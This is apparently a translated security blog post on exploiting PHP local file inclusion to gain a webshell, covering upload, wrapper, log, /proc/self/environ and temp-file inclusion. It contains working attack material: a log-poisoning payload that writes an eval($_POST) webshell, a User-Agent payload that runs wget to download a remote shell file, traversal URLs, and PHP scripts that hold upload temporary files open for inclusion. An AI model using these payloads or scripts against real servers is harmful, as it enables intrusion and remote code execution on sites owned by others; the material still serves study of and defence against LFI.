Author: LengF Blog: www.81sec.com
0x00 Preface
Many people are not very familiar with the LFI (Local File Inclusion) vulnerability class in PHP. There is actually plenty of material online, much of it in foreign-language papers, but most of it is not very detailed and few people bother to test it. This article summarises the techniques and walks through complete exploitation methods.
0x01 LFI getshell approaches
Before covering how to turn an LFI into a webshell, one reminder: the null-byte (%00) path truncation bug was fixed in PHP 5.3.4, so on newer versions it is not surprising when a payload that depends on truncating the included filename fails.
1. Including uploaded files
As long as the target supports uploads, a PHP payload can be placed in any uploaded file, whether jpg, txt or gif, and then included; include() parses the file as PHP regardless of its extension. This method is simple and needs no further explanation.
2. Including the data:// or php://input pseudo-protocols
The precondition is allow_url_include = On in php.ini (both wrappers count as remote includes), and the php:// wrapper must be available.
Let's walk through this case. Suppose the vulnerable include looks like this:
<?php
$query = $_GET['p'];
include($query);
?>
With allow_url_include = On, remote files can be included; with it Off, only local files can. Now let's look at how the PHP Input/Output wrappers can be used to get a webshell. I wrote a small exploitation program for this, shown in screenshot 01:
This confirms the vulnerability is exploitable. The exploit works on PHP 5.0 but may fail on 5.3; it is still a useful idea.
3. Including log files
Log file inclusion is the more practical approach, since Apache and other servers almost always keep logs. Why can a log give us a webshell? When we request a page on an Apache-served site and the request fails, the server records the requested address in its log. If that request carries malicious code, the code ends up in the log file. So the steps are generally:
First, request a page that does not exist, with the malicious code in the path. For example, the evil code is:
<?php fputs(fopen("/www/shell.php","w+"),"<?php eval($_POST[a]);?>");?>
URL-encode it and request:
http://www.81sec.com/ + urlencode(evil code)
The page does not exist, so an entry is written to the error log. Next, include that log:
http://www.81sec.com/test.php?p=../../var/logs/apache/www_error.log
You have to guess the Apache log path yourself; the one above is only an example. After the request, shell.php is written.
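The following Python is an added example, not code from the original post, that models why the page uses the error log rather than the access log. It is a simplified model of Apache's logging (the IP, timestamps and document root /var/www/html are constructed, and it ignores how Apache walks path components): the access log records the request line exactly as the client sent it, so a percent-encoded path stays encoded and never yields a literal <?php; the 404 entry in the error log contains the decoded filesystem path, so the code arrives intact. It also shows the User-Agent channel, where Apache escapes double quotes as \" in the logged header value, so a quote-free payload is needed there.

```python
from urllib.parse import quote, unquote

# Constructed payloads. DROPPER is the page's file-dropper; QUOTE_FREE avoids
# double quotes, which matters for the User-Agent channel (see apache_escape).
DROPPER = '<?php fputs(fopen("/www/shell.php","w+"),"<?php eval($_POST[a]);?>");?>'
QUOTE_FREE = '<?php system($_GET[c]); ?>'
DOCROOT = "/var/www/html"  # assumed document root


def apache_escape(value: str) -> str:
    """mod_log_config escapes '"' and '\\' in logged header values (non-printables
    become \\xNN). A PHP payload with double quotes therefore comes back from the
    access log with backslashes in front of them and no longer parses."""
    return value.replace("\\", "\\\\").replace('"', '\\"')


def access_log_line(method: str, encoded_path: str, user_agent: str) -> str:
    """Simplified 'combined' format access log entry. The request line is logged
    exactly as received, so a percent-encoded path stays percent-encoded."""
    return (f'203.0.113.5 - - [10/Jun/2011:12:00:00 +0800] '
            f'"{method} {encoded_path} HTTP/1.1" 404 209 "-" "{apache_escape(user_agent)}"')


def error_log_line(encoded_path: str) -> str:
    """Simplified 404 error log entry. Apache decodes the path before mapping it
    to the filesystem, so the decoded bytes are what get logged."""
    fs_path = DOCROOT + unquote(encoded_path.split("?", 1)[0])
    return (f"[Fri Jun 10 12:00:00 2011] [error] [client 203.0.113.5] "
            f"File does not exist: {fs_path}")


def executes_intact(line: str, payload: str) -> bool:
    """True only if the payload is present byte-for-byte. An encoded '%3C%3Fphp'
    has no open tag at all, and an escaped '\\"' is a syntax error to include()."""
    return payload in line


def poison_report(payload: str) -> dict:
    """Push one payload down the three channels and report which resulting log
    line would actually execute when the log file is included."""
    encoded_path = "/" + quote(payload, safe="")
    return {
        "access_log_via_path": executes_intact(
            access_log_line("GET", encoded_path, "Mozilla/5.0"), payload),
        "access_log_via_user_agent": executes_intact(
            access_log_line("GET", "/missing", payload), payload),
        "error_log_via_path": executes_intact(error_log_line(encoded_path), payload),
    }


if __name__ == "__main__":
    for name, p in (("DROPPER", DROPPER), ("QUOTE_FREE", QUOTE_FREE)):
        print(name, poison_report(p))
```

Two practical caveats the model leaves out: in a real 404, Apache typically logs the filename only up to the first missing path component, so a payload placed in the path must not contain an unencoded slash, and how it treats %2F depends on AllowEncodedSlashes; and the web server's user must be able to read the log file, which on many distributions it cannot.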
4. Including the /proc/self/environ environment variables
This relies on the process environment that Linux exposes through procfs. In many cases it does not work because the web server's user has no permission to read /proc/self/environ. Just as you would read /etc/passwd through the LFI, request /proc/self/environ and you get output like screenshot 02:
Looking at that output, it is clear why the environment is useful: it contains the variables of the current web request, including the User-Agent header, the browser identification string, which the client fully controls.
With the LFI code above, we request:
http://www.81sec.com/test.php?p=../../proc/self/environ
If you have permission and see output like that, you can get a webshell in either of the following two ways.
Method 1: the Firefox User Agent Switcher add-on
Simple and convenient. First build the payload:
<?php system("wget http://81sec.com/shell.txt -O shell.php"); ?>
Then set it as the User-Agent with the add-on (screenshot 03):
Choose Edit User Agents and fill in the payload as in screenshot 04:
Then request /proc/self/environ through the LFI and the shell is dropped. In practice this method is fairly unreliable.
Method 2: write a socket client in PHP and set the User-Agent header to your payload when sending the HTTP request. The code is similar to the exploitation program in section 2; it is left for you to build on.
5. Including session files and upload temporary files
This method comes from the k4shifz blog.
PHP saves sessions as files named sess_SESSIONID, by default under /tmp/ on Linux and c:/windows/temp/ on Windows.
Sessions are the tedious route, so that mention is enough; the interesting one is the upload temporary file. Do not assume the temp file only exists when the script calls move_uploaded_file(): PHP writes every uploaded part to a temporary file before the script runs, and if nothing moves it, PHP deletes it automatically as soon as the request ends. The way to keep it on the server is a slow connection, and then you test by including the temp file. The advantage of this method is that a multipart POST to any PHP file is enough: PHP creates the temp file first, and the slow connection stops it from being deleted.
(Prerequisites: file_uploads = On in php.ini; since PHP 5.3.1 max_file_uploads caps the number of files per request, 20 by default.)
<?php
/* Version 1: many temporary files in a short time. Each extra part adds one
   file, up to max_file_uploads (20 by default); the request is then held open
   so PHP never reaches the end-of-request cleanup. */
set_time_limit(0);
$boundary = "k4shifz_boundary";
$part = "Content-Disposition: form-data; name=\"edevil\"; filename=\"edevil.php\"\r\n"
      . "Content-Type: zzz\r\n\r\n"
      . "<?php phpinfo(); ?>\r\n"
      . "--$boundary\r\n";
$fs = fsockopen("localhost", 80);
/* HTTP/1.1 works as well */
fputs($fs, "POST /test.php HTTP/1.0\r\n"
         . "Content-Type: multipart/form-data; boundary=$boundary\r\n"
         . "Host: localhost\r\n"
         . "Content-Length: 999999\r\n\r\n"
         . "--$boundary\r\n"
         . $part);
/* keep appending parts (and keep the body incomplete) until the server drops the socket */
while (fputs($fs, $part) !== false) {
    sleep(1);
}
fclose($fs);
exit;
?>
<?php
/* Version 2: a single temporary file kept alive for a long time. The body is
   complete after the closing boundary, but the declared Content-Length is never
   reached because padding is trickled in, so the request does not finish. */
set_time_limit(0);
$boundary = "k4shifz_boundary";
$fs = fsockopen("localhost", 80);
fputs($fs, "POST /test.php HTTP/1.0\r\n"
         . "Content-Type: multipart/form-data; boundary=$boundary\r\n"
         . "Host: localhost\r\n"
         . "Content-Length: 999999\r\n\r\n"
         . "--$boundary\r\n"
         . "Content-Disposition: form-data; name=\"edevil\"; filename=\"edevil.php\"\r\n"
         . "Content-Type: zzz\r\n\r\n"
         . "<?php phpinfo(); ?>\r\n"
         . "--$boundary--\r\n");
/* trickle padding until the server drops the socket */
while (fputs($fs, "AAAA") !== false) {
    sleep(1);
}
fclose($fs);
exit;
?>
I have never tested this in practice, so I dare not say more; test it yourself.
6. Including other files created by the PHP application
This generally depends on how well you understand the application and is suited to white-box testing. Once you find an LFI, read the rest of the application's source carefully: files the application writes itself are candidates for inclusion, and a variable-overwrite vulnerability may let you control what gets written, so that the LFI executes PHP code. The two variable-overwrite vulnerabilities in bo-blog are an example.
Experienced researchers will know many more bypasses; this article is only an introduction. Real-world situations vary, and you will have to adapt as you go.
[Reference]
[+] http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
[+] http://www.bkjia.com/Article/201106/94413.html